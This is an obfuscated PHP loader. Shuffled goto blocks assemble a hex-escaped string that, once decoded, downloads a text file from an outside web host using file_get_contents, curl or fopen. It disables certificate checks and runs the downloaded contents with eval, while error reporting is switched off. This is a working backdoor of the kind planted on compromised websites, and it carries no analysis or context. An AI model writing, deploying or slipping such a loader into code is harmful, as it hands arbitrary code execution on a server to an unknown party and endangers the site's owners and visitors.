<?php
error_reporting(0);
$kdvgt=''; goto _695925D1D2EC3;
_695925D1D2EC9: $kdvgt.="\x6f\x6d\x2f\x37\x37\x2e\x74\x78\x74\x27\x3b\x24"; goto _695925D1D2ECA;
_695925D1D2ED8: $kdvgt.="\x65\x74\x28\x27\x61\x6c\x6c\x6f\x77\x5f\x75\x72"; goto _695925D1D2ED9;
_695925D1D2ED3: $kdvgt.="\x31\x33\x3d\x3e\x31\x2c\x36\x34\x3d\x3e\x30\x5d"; goto _695925D1D2ED4;
_695925D1D2ECF: $kdvgt.="\x69\x74\x27\x29\x29\x7b\x24\x68\x3d\x63\x75\x72"; goto _695925D1D2ED0;
_695925D1D2ED1: $kdvgt.="\x75\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x5f\x61"; goto _695925D1D2ED2;
_695925D1D2EDF: $kdvgt.="\x63\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x7d"; goto _695925D1D2EE0;
_695925D1D2ED4: $kdvgt.="\x29\x3b\x24\x63\x3d\x63\x75\x72\x6c\x5f\x65\x78"; goto _695925D1D2ED5;
_695925D1D2ECE: $kdvgt.="\x73\x74\x73\x28\x27\x63\x75\x72\x6c\x5f\x69\x6e"; goto _695925D1D2ECF;
_695925D1D2EC8: $kdvgt.="\x73\x74\x65\x70\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; goto _695925D1D2EC9;
_695925D1D2EE0: $kdvgt.="\x7d\x24\x63\x3f\x65\x76\x61\x6c\x28\x22\x3f\x3e"; goto _695925D1D2EE1;
_695925D1D2EDD: $kdvgt.="\x24\x68\x29\x29\x24\x63\x2e\x3d\x66\x72\x65\x61"; goto _695925D1D2EDE;
_695925D1D2ED9: $kdvgt.="\x6c\x5f\x66\x6f\x70\x65\x6e\x27\x29\x29\x7b\x24"; goto _695925D1D2EDA;
_695925D1D2ECC: $kdvgt.="\x3b\x69\x66\x28\x21\x24\x63\x29\x7b\x69\x66\x28"; goto _695925D1D2ECD;
_695925D1D2EDB: $kdvgt.="\x27\x72\x27\x29\x3b\x69\x66\x28\x24\x68\x29\x7b"; goto _695925D1D2EDC;
_695925D1D2ECB: $kdvgt.="\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x24\x75\x29"; goto _695925D1D2ECC;
_695925D1D2ED0: $kdvgt.="\x6c\x5f\x69\x6e\x69\x74\x28\x24\x75\x29\x3b\x63"; goto _695925D1D2ED1;
_695925D1D2EE1: $kdvgt.="\x24\x63\x22\x29\x3a\x64\x69\x65\x28\x27\x46\x61"; goto _695925D1D2EE2;
_695925D1D2ED2: $kdvgt.="\x72\x72\x61\x79\x28\x24\x68\x2c\x5b\x31\x39\x39"; goto _695925D1D2ED3;
_695925D1D2EE2: $kdvgt.="\x69\x6c\x27\x29\x3b"; goto _695925D1D2EE3;
_695925D1D2ED7: $kdvgt.="\x66\x28\x21\x24\x63\x26\x26\x69\x6e\x69\x5f\x67"; goto _695925D1D2ED8;
_695925D1D2ED5: $kdvgt.="\x65\x63\x28\x24\x68\x29\x3b\x63\x75\x72\x6c\x5f"; goto _695925D1D2ED6;
_695925D1D2ED6: $kdvgt.="\x63\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x69"; goto _695925D1D2ED7;
_695925D1D2EDC: $kdvgt.="\x77\x68\x69\x6c\x65\x28\x21\x66\x65\x6f\x66\x28"; goto _695925D1D2EDD;
_695925D1D2ECD: $kdvgt.="\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69"; goto _695925D1D2ECE;
_695925D1D2ECA: $kdvgt.="\x63\x3d\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f"; goto _695925D1D2ECB;
_695925D1D2EDE: $kdvgt.="\x64\x28\x24\x68\x2c\x31\x30\x32\x34\x29\x3b\x66"; goto _695925D1D2EDF;
_695925D1D2EC3: $kdvgt.="\x24\x75\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f"; goto _695925D1D2EC8;
_695925D1D2EDA: $kdvgt.="\x68\x3d\x40\x66\x6f\x70\x65\x6e\x28\x24\x75\x2c"; goto _695925D1D2EDB;
_695925D1D2EE3: eval($kdvgt);
?>
